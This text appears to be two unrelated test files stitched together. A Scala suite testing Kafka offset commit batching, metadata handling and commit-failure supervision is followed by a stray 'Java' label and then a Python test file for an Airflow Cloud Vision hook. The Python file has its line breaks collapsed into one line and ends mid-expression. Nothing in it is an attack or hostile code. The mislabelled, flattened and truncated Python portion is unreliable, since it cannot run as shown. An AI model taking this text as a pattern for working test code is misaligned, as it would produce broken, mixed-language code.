    //emulate commit
    commitLog.calls.foreach {
      case (offsets, callback) => callback.onComplete(offsets.asJava, null)
    }

    allCommits.futureValue should have size (count.toLong)
    control.shutdown().futureValue shouldBe Done
  }

  it should "support commit batching" in assertAllStagesStopped {
    val commitLog = new ConsumerMock.LogHandler()
    val mock = new ConsumerMock[K, V](commitLog)
    val (control, probe) = createCommittableSource(mock.mock, topics = Set("topic1", "topic2"))
      .toMat(TestSink.probe)(Keep.both)
      .run()

    val msgsTopic1 = (1 to 3).map(createMessage(_, "topic1"))
    val msgsTopic2 = (11 to 13).map(createMessage(_, "topic2"))
    mock.enqueue(msgsTopic1.map(toRecord))
    mock.enqueue(msgsTopic2.map(toRecord))

    probe.request(100)
    // Fold all six offsets into a single batch, then commit the batch once.
    val batch = probe
      .expectNextN(6)
      .map(_.committableOffset)
      .foldLeft(CommittableOffsetBatch.empty)(_.updated(_))

    val done = batch.commitInternal()

    awaitAssert {
      commitLog.calls should have size (1)
    }

    // Only the highest offset per topic-partition (+1) should be committed.
    val commitMap = commitLog.calls.head._1
    commitMap(new TopicPartition("topic1", 1)).offset should ===(msgsTopic1.last.record.offset() + 1)
    commitMap(new TopicPartition("topic2", 1)).offset should ===(msgsTopic2.last.record.offset() + 1)

    //emulate commit
    commitLog.calls.foreach {
      case (offsets, callback) => callback.onComplete(offsets.asJava, null)
    }

    Await.result(done, remainingOrDefault)
    Await.result(control.shutdown(), remainingOrDefault)
  }

  it should "support commit batching with metadata" in assertAllStagesStopped {
    val commitLog = new ConsumerMock.LogHandler()
    val mock = new ConsumerMock[K, V](commitLog)
    val (control, probe) = createSourceWithMetadata(mock.mock,
                                                   (rec: ConsumerRecord[K, V]) => rec.offset.toString,
                                                   topics = Set("topic1", "topic2"))
      .toMat(TestSink.probe)(Keep.both)
      .run()

    val msgsTopic1 = (1 to 3).map(createMessage(_, "topic1"))
    val msgsTopic2 = (11 to 13).map(createMessage(_, "topic2"))
    mock.enqueue(msgsTopic1.map(toRecord))
    mock.enqueue(msgsTopic2.map(toRecord))

    probe.request(100)
    val batch = probe
      .expectNextN(6)
      .map(_.committableOffset)
      .foldLeft(CommittableOffsetBatch.empty)(_.updated(_))

    val done = batch.commitInternal()

    awaitAssert {
      commitLog.calls should have size (1)
    }

    // Batch keeps the metadata of the last (highest-offset) record per topic-partition.
    val commitMap = commitLog.calls.head._1
    commitMap(new TopicPartition("topic1", 1)).offset should ===(msgsTopic1.last.record.offset() + 1)
    commitMap(new TopicPartition("topic2", 1)).offset should ===(msgsTopic2.last.record.offset() + 1)
    commitMap(new TopicPartition("topic1", 1)).metadata() should ===(msgsTopic1.last.record.offset().toString)
    commitMap(new TopicPartition("topic2", 1)).metadata() should ===(msgsTopic2.last.record.offset().toString)

    //emulate commit
    commitLog.calls.foreach {
      case (offsets, callback) => callback.onComplete(offsets.asJava, null)
    }

    Await.result(done, remainingOrDefault)
    Await.result(control.shutdown(), remainingOrDefault)
  }

  it should "support merging commit batches with metadata" in assertAllStagesStopped {
    val commitLog = new ConsumerMock.LogHandler()
    val mock = new ConsumerMock[K, V](commitLog)
    val (control, probe) = createSourceWithMetadata(mock.mock,
                                                   (rec: ConsumerRecord[K, V]) => rec.offset.toString,
                                                   topics = Set("topic1", "topic2"))
      .toMat(TestSink.probe)(Keep.both)
      .run()

    val msgsTopic1 = (1 to 3).map(createMessage(_, "topic1"))
    val msgsTopic2 = (11 to 13).map(createMessage(_, "topic2"))
    mock.enqueue(msgsTopic1.map(toRecord))
    mock.enqueue(msgsTopic2.map(toRecord))

    probe.request(100)
    // Build several small batches (pairs) first, then merge them into one —
    // exercises batch-with-batch merging rather than offset-by-offset updates.
    val batch = probe
      .expectNextN(6)
      .map(_.committableOffset)
      .grouped(2)
      .map(_.foldLeft(CommittableOffsetBatch.empty)(_ updated _))
      .foldLeft(CommittableOffsetBatch.empty)(_ updated _)

    val done = batch.commitInternal()

    awaitAssert {
      commitLog.calls should have size (1)
    }

    val commitMap = commitLog.calls.head._1
    commitMap(new TopicPartition("topic1", 1)).offset should ===(msgsTopic1.last.record.offset() + 1)
    commitMap(new TopicPartition("topic2", 1)).offset should ===(msgsTopic2.last.record.offset() + 1)
    commitMap(new TopicPartition("topic1", 1)).metadata() should ===(msgsTopic1.last.record.offset().toString)
    commitMap(new TopicPartition("topic2", 1)).metadata() should ===(msgsTopic2.last.record.offset().toString)

    //emulate commit
    commitLog.calls.foreach {
      case (offsets, callback) => callback.onComplete(offsets.asJava, null)
    }

    Await.result(done, remainingOrDefault)
    Await.result(control.shutdown(), remainingOrDefault)
  }

  //FIXME looks like current implementation of batch committer is incorrect
  it should "support commit batching from more than one stage" in assertAllStagesStopped {
    val commitLog1 = new ConsumerMock.LogHandler()
    val commitLog2 = new ConsumerMock.LogHandler()
    val mock1 = new ConsumerMock[K, V](commitLog1)
    val mock2 = new ConsumerMock[K, V](commitLog2)
    // Two independent sources/consumers with different group ids; one merged batch
    // must route each group's offsets back to its own consumer.
    val (control1, probe1) = createCommittableSource(mock1.mock, "group1", Set("topic1", "topic2"))
      .toMat(TestSink.probe)(Keep.both)
      .run()
    val (control2, probe2) = createCommittableSource(mock2.mock, "group2", Set("topic1", "topic3"))
      .toMat(TestSink.probe)(Keep.both)
      .run()

    val msgs1a = (1 to 3).map(createMessage(_, "topic1", "group1"))
    val msgs1b = (11 to 13).map(createMessage(_, "topic2", "group1"))
    mock1.enqueue(msgs1a.map(toRecord))
    mock1.enqueue(msgs1b.map(toRecord))

    val msgs2a = (1 to 3).map(createMessage(_, "topic1", "group2"))
    val msgs2b = (11 to 13).map(createMessage(_, "topic3", "group2"))
    mock2.enqueue(msgs2a.map(toRecord))
    mock2.enqueue(msgs2b.map(toRecord))

    probe1.request(100)
    probe2.request(100)

    val batch1 = probe1
      .expectNextN(6)
      .map(_.committableOffset)
      .foldLeft(CommittableOffsetBatch.empty)(_.updated(_))
    // batch2 is built on top of batch1, so committing it covers both groups.
    val batch2 = probe2
      .expectNextN(6)
      .map(_.committableOffset)
      .foldLeft(batch1)(_.updated(_))

    val done2 = batch2.commitInternal()

    awaitAssert {
      commitLog1.calls should have size (1)
      commitLog2.calls should have size (1)
    }

    val commitMap1 = commitLog1.calls.head._1
    commitMap1(new TopicPartition("topic1", 1)).offset should ===(msgs1a.last.record.offset() + 1)
    commitMap1(new TopicPartition("topic2", 1)).offset should ===(msgs1b.last.record.offset() + 1)

    val commitMap2 = commitLog2.calls.head._1
    commitMap2(new TopicPartition("topic1", 1)).offset should ===(msgs2a.last.record.offset() + 1)
    commitMap2(new TopicPartition("topic3", 1)).offset should ===(msgs2b.last.record.offset() + 1)

    //emulate commit
    commitLog1.calls.foreach {
      case (offsets, callback) => callback.onComplete(offsets.asJava, null)
    }
    commitLog2.calls.foreach {
      case (offsets, callback) => callback.onComplete(offsets.asJava, null)
    }

    Await.result(done2, remainingOrDefault)
    Await.result(control1.shutdown(), remainingOrDefault)
    Await.result(control2.shutdown(), remainingOrDefault)
  }

  // Same logic as "support commit batching with metadata" above
  "Tell committing" should "support commit batching with metadata" in assertAllStagesStopped {
    val commitLog = new ConsumerMock.LogHandler()
    val mock = new ConsumerMock[K, V](commitLog)
    val (control, probe) = createSourceWithMetadata(mock.mock,
                                                   (rec: ConsumerRecord[K, V]) => rec.offset.toString,
                                                   topics = Set("topic1", "topic2"))
      .toMat(TestSink.probe)(Keep.both)
      .run()

    val msgsTopic1 = (1 to 3).map(createMessage(_, "topic1"))
    val msgsTopic2 = (11 to 13).map(createMessage(_, "topic2"))
    mock.enqueue(msgsTopic1.map(toRecord))
    mock.enqueue(msgsTopic2.map(toRecord))

    probe.request(100)
    val batch = probe
      .expectNextN(6)
      .map(_.committableOffset)
      .foldLeft(CommittableOffsetBatch.empty)(_.updated(_))

    // Fire-and-forget commit: no Future to await, only the logged commitAsync call.
    batch.tellCommit()

    awaitAssert {
      commitLog.calls should have size (1)
    }

    val commitMap = commitLog.calls.head._1
    commitMap(new TopicPartition("topic1", 1)).offset should ===(msgsTopic1.last.record.offset() + 1)
    commitMap(new TopicPartition("topic2", 1)).offset should ===(msgsTopic2.last.record.offset() + 1)
    commitMap(new TopicPartition("topic1", 1)).metadata() should ===(msgsTopic1.last.record.offset().toString)
    commitMap(new TopicPartition("topic2", 1)).metadata() should ===(msgsTopic2.last.record.offset().toString)

    //emulate commit
    commitLog.calls.foreach {
      case (offsets, callback) => callback.onComplete(offsets.asJava, null)
    }

    Await.result(control.shutdown(), remainingOrDefault)
  }

  "Committer.flow" should "fail in case of an exception during commit" in assertAllStagesStopped {
    // maxBatch = 1 forces a commitAsync per element, so the single failure is deterministic.
    val committerSettings = CommitterSettings(system)
      .withMaxBatch(1L)
    val commitLog = new internal.ConsumerMock.LogHandler()
    val mock = new ConsumerMock[K, V](commitLog)
    val msg = createMessage(1)
    mock.enqueue(List(toRecord(msg)))

    val (control, probe) = createCommittableSource(mock.mock)
      .map(_.committableOffset)
      .toMat(Committer.sink(committerSettings))(Keep.both)
      .run()

    awaitAssert {
      commitLog.calls should have size 1
    }
    emulateFailedCommit(commitLog)

    // Without supervision the sink's materialized Future[Done] fails with the commit error.
    probe.failed.futureValue shouldBe a[CommitFailedException]
    control.shutdown().futureValue shouldBe Done
  }

  it should "recover with supervision in case of commit fail" in assertAllStagesStopped {
    val committerSettings = CommitterSettings(system)
      .withMaxBatch(1L)
    val commitLog = new ConsumerMock.LogHandler()
    val mock = new ConsumerMock[K, V](commitLog)
    val msg = createMessage(1)
    mock.enqueue(List(toRecord(msg)))

    // Resume only on CommitFailedException; anything else still stops the stream.
    val resumeOnCommitFailed: Supervision.Decider = {
      case _: CommitFailedException => Supervision.Resume
      case _ => Supervision.Stop
    }

    val (control, probe) = createCommittableSource(mock.mock)
      .map(_.committableOffset)
      .toMat(
        Committer
          .sink(committerSettings)
          .withAttributes(ActorAttributes.supervisionStrategy(resumeOnCommitFailed))
      )(Keep.both)
      .run()

    awaitAssert {
      commitLog.calls should have size 1
    }
    emulateFailedCommit(commitLog)

    // With Resume supervision the sink completes normally despite the failed commit.
    control.shutdown().futureValue shouldBe Done
    probe.futureValue shouldBe Done
  }

  // Completes the first recorded commitAsync callback with a CommitFailedException.
  private def emulateFailedCommit(commitLog: ConsumerMock.LogHandler): Unit = {
    val failure = new CommitFailedException()
    commitLog.calls.head match {
      case (_, callback) => callback.onComplete(null, failure)
    }
  }
}
Java
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import unittest from unittest import mock import pytest from google.cloud.vision import enums from google.cloud.vision_v1 import ProductSearchClient from google.cloud.vision_v1.proto.image_annotator_pb2 import ( AnnotateImageResponse, EntityAnnotation, SafeSearchAnnotation, ) from google.cloud.vision_v1.proto.product_search_service_pb2 import Product, ProductSet, ReferenceImage from google.protobuf.json_format import MessageToDict from parameterized import parameterized from airflow.exceptions import AirflowException from airflow.providers.google.cloud.hooks.vision import ERR_DIFF_NAMES, ERR_UNABLE_TO_CREATE, CloudVisionHook from tests.providers.google.cloud.utils.base_gcp_mock import mock_base_gcp_hook_default_project_id PROJECT_ID_TEST = 'project-id' PROJECT_ID_TEST_2 = 'project-id-2' LOC_ID_TEST = 'loc-id' LOC_ID_TEST_2 = 'loc-id-2' PRODUCTSET_ID_TEST = 'ps-id' PRODUCTSET_ID_TEST_2 = 'ps-id-2' PRODUCTSET_NAME_TEST = f'projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/productSets/{PRODUCTSET_ID_TEST}' PRODUCT_ID_TEST = 'p-id' PRODUCT_ID_TEST_2 = 'p-id-2' PRODUCT_NAME_TEST = f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}" PRODUCT_NAME = 
f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}" REFERENCE_IMAGE_ID_TEST = 'ri-id' REFERENCE_IMAGE_GEN_ID_TEST = 'ri-id' ANNOTATE_IMAGE_REQUEST = { 'image': {'source': {'image_uri': "gs://bucket-name/object-name"}}, 'features': [{'type': enums.Feature.Type.LOGO_DETECTION}], } BATCH_ANNOTATE_IMAGE_REQUEST = [ { 'image': {'source': {'image_uri': "gs://bucket-name/object-name"}}, 'features': [{'type': enums.Feature.Type.LOGO_DETECTION}], }, { 'image': {'source': {'image_uri': "gs://bucket-name/object-name"}}, 'features': [{'type': enums.Feature.Type.LOGO_DETECTION}], }, ] REFERENCE_IMAGE_NAME_TEST = ( f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/" f"{PRODUCTSET_ID_TEST}/referenceImages/{REFERENCE_IMAGE_ID_TEST}" ) REFERENCE_IMAGE_TEST = ReferenceImage(name=REFERENCE_IMAGE_GEN_ID_TEST) REFERENCE_IMAGE_WITHOUT_ID_NAME = ReferenceImage() DETECT_TEST_IMAGE = {"source": {"image_uri": "https://foo.com/image.jpg"}} DETECT_TEST_ADDITIONAL_PROPERTIES = {"test-property-1": "test-value-1", "test-property-2": "test-value-2"} class TestGcpVisionHook(unittest.TestCase): def setUp(self): with mock.patch( 'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.__init__', new=mock_base_gcp_hook_default_project_id, ): self.hook = CloudVisionHook(gcp_conn_id='test') @mock.patch( "airflow.providers.google.cloud.hooks.vision.CloudVisionHook.client_info", new_callable=mock.PropertyMock, ) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook._get_credentials") @mock.patch("airflow.providers.google.cloud.hooks.vision.ProductSearchClient") def test_product_search_client_creation(self, mock_client, mock_get_creds, mock_client_info): result = self.hook.get_conn() mock_client.assert_called_once_with( credentials=mock_get_creds.return_value, client_info=mock_client_info.return_value ) assert mock_client.return_value == result assert self.hook._client == result 
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_create_productset_explicit_id(self, get_conn): # Given create_product_set_method = get_conn.return_value.create_product_set create_product_set_method.return_value = None parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST) product_set = ProductSet() # When result = self.hook.create_product_set( location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, product_set=product_set, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) # Then # ProductSet ID was provided explicitly in the method call above, should be returned from the method assert result == PRODUCTSET_ID_TEST create_product_set_method.assert_called_once_with( parent=parent, product_set=product_set, product_set_id=PRODUCTSET_ID_TEST, retry=None, timeout=None, metadata=None, ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_create_productset_autogenerated_id(self, get_conn): # Given autogenerated_id = 'autogen-id' response_product_set = ProductSet( name=ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, autogenerated_id) ) create_product_set_method = get_conn.return_value.create_product_set create_product_set_method.return_value = response_product_set parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST) product_set = ProductSet() # When result = self.hook.create_product_set( location=LOC_ID_TEST, product_set_id=None, product_set=product_set, project_id=PROJECT_ID_TEST ) # Then # ProductSet ID was not provided in the method call above. Should be extracted from the API response # and returned. 
assert result == autogenerated_id create_product_set_method.assert_called_once_with( parent=parent, product_set=product_set, product_set_id=None, retry=None, timeout=None, metadata=None, ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_create_productset_autogenerated_id_wrong_api_response(self, get_conn): # Given response_product_set = None create_product_set_method = get_conn.return_value.create_product_set create_product_set_method.return_value = response_product_set parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST) product_set = ProductSet() # When with pytest.raises(AirflowException) as ctx: self.hook.create_product_set( location=LOC_ID_TEST, product_set_id=None, product_set=product_set, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) # Then # API response was wrong (None) and thus ProductSet ID extraction should fail. err = ctx.value assert 'Unable to get name from response...' in str(err) create_product_set_method.assert_called_once_with( parent=parent, product_set=product_set, product_set_id=None, retry=None, timeout=None, metadata=None, ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_get_productset(self, get_conn): # Given name = ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST) response_product_set = ProductSet(name=name) get_product_set_method = get_conn.return_value.get_product_set get_product_set_method.return_value = response_product_set # When response = self.hook.get_product_set( location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, project_id=PROJECT_ID_TEST ) # Then assert response assert response == MessageToDict(response_product_set) get_product_set_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_update_productset_no_explicit_name(self, 
get_conn): # Given product_set = ProductSet() update_product_set_method = get_conn.return_value.update_product_set update_product_set_method.return_value = product_set productset_name = ProductSearchClient.product_set_path( PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST ) # When result = self.hook.update_product_set( location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, product_set=product_set, update_mask=None, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) # Then assert result == MessageToDict(product_set) update_product_set_method.assert_called_once_with( product_set=ProductSet(name=productset_name), metadata=None, retry=None, timeout=None, update_mask=None, ) @parameterized.expand([(None, None), (None, PRODUCTSET_ID_TEST), (LOC_ID_TEST, None)]) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_update_productset_no_explicit_name_and_missing_params_for_constructed_name( self, location, product_set_id, get_conn ): # Given update_product_set_method = get_conn.return_value.update_product_set update_product_set_method.return_value = None product_set = ProductSet() # When with pytest.raises(AirflowException) as ctx: self.hook.update_product_set( location=location, product_set_id=product_set_id, product_set=product_set, update_mask=None, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) err = ctx.value assert err assert ERR_UNABLE_TO_CREATE.format(label='ProductSet', id_label='productset_id') in str(err) update_product_set_method.assert_not_called() @parameterized.expand([(None, None), (None, PRODUCTSET_ID_TEST), (LOC_ID_TEST, None)]) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_update_productset_explicit_name_missing_params_for_constructed_name( self, location, product_set_id, get_conn ): # Given explicit_ps_name = ProductSearchClient.product_set_path( PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCTSET_ID_TEST_2 ) product_set = 
ProductSet(name=explicit_ps_name) update_product_set_method = get_conn.return_value.update_product_set update_product_set_method.return_value = product_set # When result = self.hook.update_product_set( location=location, product_set_id=product_set_id, product_set=product_set, update_mask=None, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) # Then assert result == MessageToDict(product_set) update_product_set_method.assert_called_once_with( product_set=ProductSet(name=explicit_ps_name), metadata=None, retry=None, timeout=None, update_mask=None, ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_update_productset_explicit_name_different_from_constructed(self, get_conn): # Given update_product_set_method = get_conn.return_value.update_product_set update_product_set_method.return_value = None explicit_ps_name = ProductSearchClient.product_set_path( PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCTSET_ID_TEST_2 ) product_set = ProductSet(name=explicit_ps_name) template_ps_name = ProductSearchClient.product_set_path( PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST ) # When # Location and product_set_id are passed in addition to a ProductSet with an explicit name, # but both names differ (constructed != explicit). # Should throw AirflowException in this case. 
with pytest.raises(AirflowException) as ctx: self.hook.update_product_set( location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, product_set=product_set, update_mask=None, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) err = ctx.value # self.assertIn("The required parameter 'project_id' is missing", str(err)) assert err assert ( ERR_DIFF_NAMES.format( explicit_name=explicit_ps_name, constructed_name=template_ps_name, label="ProductSet", id_label="productset_id", ) in str(err) ) update_product_set_method.assert_not_called() @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_delete_productset(self, get_conn): # Given delete_product_set_method = get_conn.return_value.delete_product_set delete_product_set_method.return_value = None name = ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST) # When response = self.hook.delete_product_set( location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, project_id=PROJECT_ID_TEST ) # Then assert response is None delete_product_set_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None) @mock.patch( 'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn', **{'return_value.create_reference_image.return_value': REFERENCE_IMAGE_TEST}, ) def test_create_reference_image_explicit_id(self, get_conn): # Given create_reference_image_method = get_conn.return_value.create_reference_image # When result = self.hook.create_reference_image( project_id=PROJECT_ID_TEST, location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, reference_image=REFERENCE_IMAGE_WITHOUT_ID_NAME, reference_image_id=REFERENCE_IMAGE_ID_TEST, ) # Then # Product ID was provided explicitly in the method call above, should be returned from the method assert result == REFERENCE_IMAGE_ID_TEST create_reference_image_method.assert_called_once_with( parent=PRODUCT_NAME, reference_image=REFERENCE_IMAGE_WITHOUT_ID_NAME, 
reference_image_id=REFERENCE_IMAGE_ID_TEST, retry=None, timeout=None, metadata=None, ) @mock.patch( 'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn', **{'return_value.create_reference_image.return_value': REFERENCE_IMAGE_TEST}, ) def test_create_reference_image_autogenerated_id(self, get_conn): # Given create_reference_image_method = get_conn.return_value.create_reference_image # When result = self.hook.create_reference_image( project_id=PROJECT_ID_TEST, location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, reference_image=REFERENCE_IMAGE_TEST, reference_image_id=REFERENCE_IMAGE_ID_TEST, ) # Then # Product ID was provided explicitly in the method call above, should be returned from the method assert result == REFERENCE_IMAGE_GEN_ID_TEST create_reference_image_method.assert_called_once_with( parent=PRODUCT_NAME, reference_image=REFERENCE_IMAGE_TEST, reference_image_id=REFERENCE_IMAGE_ID_TEST, retry=None, timeout=None, metadata=None, ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_add_product_to_product_set(self, get_conn): # Given add_product_to_product_set_method = get_conn.return_value.add_product_to_product_set # When self.hook.add_product_to_product_set( product_set_id=PRODUCTSET_ID_TEST, product_id=PRODUCT_ID_TEST, location=LOC_ID_TEST, project_id=PROJECT_ID_TEST, ) # Then # Product ID was provided explicitly in the method call above, should be returned from the method add_product_to_product_set_method.assert_called_once_with( name=PRODUCTSET_NAME_TEST, product=PRODUCT_NAME_TEST, retry=None, timeout=None, metadata=None ) # remove_product_from_product_set @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_remove_product_from_product_set(self, get_conn): # Given remove_product_from_product_set_method = get_conn.return_value.remove_product_from_product_set # When self.hook.remove_product_from_product_set( product_set_id=PRODUCTSET_ID_TEST, 
product_id=PRODUCT_ID_TEST, location=LOC_ID_TEST, project_id=PROJECT_ID_TEST, ) # Then # Product ID was provided explicitly in the method call above, should be returned from the method remove_product_from_product_set_method.assert_called_once_with( name=PRODUCTSET_NAME_TEST, product=PRODUCT_NAME_TEST, retry=None, timeout=None, metadata=None ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client') def test_annotate_image(self, annotator_client_mock): # Given annotate_image_method = annotator_client_mock.annotate_image # When self.hook.annotate_image(request=ANNOTATE_IMAGE_REQUEST) # Then # Product ID was provided explicitly in the method call above, should be returned from the method annotate_image_method.assert_called_once_with( request=ANNOTATE_IMAGE_REQUEST, retry=None, timeout=None ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client') def test_batch_annotate_images(self, annotator_client_mock): # Given batch_annotate_images_method = annotator_client_mock.batch_annotate_images # When self.hook.batch_annotate_images(requests=BATCH_ANNOTATE_IMAGE_REQUEST) # Then # Product ID was provided explicitly in the method call above, should be returned from the method batch_annotate_images_method.assert_called_once_with( requests=BATCH_ANNOTATE_IMAGE_REQUEST, retry=None, timeout=None ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_create_product_explicit_id(self, get_conn): # Given create_product_method = get_conn.return_value.create_product create_product_method.return_value = None parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST) product = Product() # When result = self.hook.create_product( location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, product=product, project_id=PROJECT_ID_TEST ) # Then # Product ID was provided explicitly in the method call above, should be returned from the method assert result == PRODUCT_ID_TEST 
create_product_method.assert_called_once_with( parent=parent, product=product, product_id=PRODUCT_ID_TEST, retry=None, timeout=None, metadata=None, ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_create_product_autogenerated_id(self, get_conn): # Given autogenerated_id = 'autogen-p-id' response_product = Product( name=ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, autogenerated_id) ) create_product_method = get_conn.return_value.create_product create_product_method.return_value = response_product parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST) product = Product() # When result = self.hook.create_product( location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST ) # Then # Product ID was not provided in the method call above. Should be extracted from the API response # and returned. assert result == autogenerated_id create_product_method.assert_called_once_with( parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_create_product_autogenerated_id_wrong_name_in_response(self, get_conn): # Given wrong_name = 'wrong_name_not_a_correct_path' response_product = Product(name=wrong_name) create_product_method = get_conn.return_value.create_product create_product_method.return_value = response_product parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST) product = Product() # When with pytest.raises(AirflowException) as ctx: self.hook.create_product( location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST ) # Then # API response was wrong (wrong name format) and thus ProductSet ID extraction should fail. 
err = ctx.value assert 'Unable to get id from name' in str(err) create_product_method.assert_called_once_with( parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_create_product_autogenerated_id_wrong_api_response(self, get_conn): # Given response_product = None create_product_method = get_conn.return_value.create_product create_product_method.return_value = response_product parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST) product = Product() # When with pytest.raises(AirflowException) as ctx: self.hook.create_product( location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST ) # Then # API response was wrong (None) and thus ProductSet ID extraction should fail. err = ctx.value assert 'Unable to get name from response...' in str(err) create_product_method.assert_called_once_with( parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_update_product_no_explicit_name(self, get_conn): # Given product = Product() update_product_method = get_conn.return_value.update_product update_product_method.return_value = product product_name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST) # When result = self.hook.update_product( location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, product=product, update_mask=None, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) # Then assert result == MessageToDict(product) update_product_method.assert_called_once_with( product=Product(name=product_name), metadata=None, retry=None, timeout=None, update_mask=None ) @parameterized.expand([(None, None), (None, PRODUCT_ID_TEST), (LOC_ID_TEST, None)]) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def 
test_update_product_no_explicit_name_and_missing_params_for_constructed_name( self, location, product_id, get_conn ): # Given update_product_method = get_conn.return_value.update_product update_product_method.return_value = None product = Product() # When with pytest.raises(AirflowException) as ctx: self.hook.update_product( location=location, product_id=product_id, product=product, update_mask=None, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) err = ctx.value assert err assert ERR_UNABLE_TO_CREATE.format(label='Product', id_label='product_id') in str(err) update_product_method.assert_not_called() @parameterized.expand([(None, None), (None, PRODUCT_ID_TEST), (LOC_ID_TEST, None)]) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_update_product_explicit_name_missing_params_for_constructed_name( self, location, product_id, get_conn ): # Given explicit_p_name = ProductSearchClient.product_path( PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCT_ID_TEST_2 ) product = Product(name=explicit_p_name) update_product_method = get_conn.return_value.update_product update_product_method.return_value = product # When result = self.hook.update_product( location=location, product_id=product_id, product=product, update_mask=None, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) # Then assert result == MessageToDict(product) update_product_method.assert_called_once_with( product=Product(name=explicit_p_name), metadata=None, retry=None, timeout=None, update_mask=None ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_update_product_explicit_name_different_from_constructed(self, get_conn): # Given update_product_method = get_conn.return_value.update_product update_product_method.return_value = None explicit_p_name = ProductSearchClient.product_path( PROJECT_ID_TEST_2, LOC_ID_TEST_2, 